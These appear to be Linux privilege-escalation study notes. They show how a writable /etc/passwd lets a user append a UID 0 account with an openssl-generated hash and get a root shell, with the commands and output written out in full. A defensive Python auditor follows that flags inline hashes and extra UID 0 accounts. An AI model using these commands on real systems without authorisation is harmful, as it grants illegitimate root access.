Abusing Password Authentication
How Linux Passwords Work
Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in /etc/shadow, which is not readable by normal users.
Exploiting Legacy /etc/passwd
Historically, password hashes, along with other account information, were stored in the world-readable file /etc/passwd. For backwards compatibility, if a password hash is present in the second column of an /etc/passwd user record, it is still considered valid for authentication. This means that if we can write to /etc/passwd, we can effectively set an arbitrary password for any account.
Adding an elevated account when /etc/passwd is writable
Generate a hash using the openssl tool
joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g
joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
joe@debian-privesc:~$ su root2
Password: w00t
root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)
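As an added defensive check (not part of the original notes), this Python script parses passwd-format records and flags the two artifacts the technique above leaves behind: a non-placeholder second field and an extra UID 0 account. It also reports whether /etc/passwd is group- or world-writable. The sample records are constructed, and audit_passwd / passwd_file_writable are hypothetical helper names.

```python
#!/usr/bin/env python3
"""Audit passwd-format records for legacy inline hashes and extra UID 0 users."""
import os
import stat

# Constructed sample: normal records plus a planted 'root2' entry that
# carries its hash inline and UID 0, the pattern shown in the notes above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
joe:x:1000:1000:joe:/home/joe:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (user, reason) findings for passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed record on line %d" % lineno))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            # Empty field: no password is required at all.
            findings.append((user, "empty password field"))
        elif pw != "x" and not pw.startswith(("!", "*")):
            # 'x' means "look in /etc/shadow"; '!'/'*' prefixes mean locked.
            # Anything else is a usable hash that bypasses /etc/shadow.
            findings.append((user, "password hash stored in /etc/passwd"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


def passwd_file_writable(path="/etc/passwd"):
    """True if path is group- or world-writable (the precondition for the
    append shown above); None if the path does not exist."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return None
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for user, reason in audit_passwd(SAMPLE_PASSWD):
        print("%s: %s" % (user, reason))
    print("/etc/passwd group/world-writable:", passwd_file_writable())
```

Run it as a normal user against the live file with `audit_passwd(open("/etc/passwd").read())`; any finding other than a deliberately locked account deserves an incident ticket.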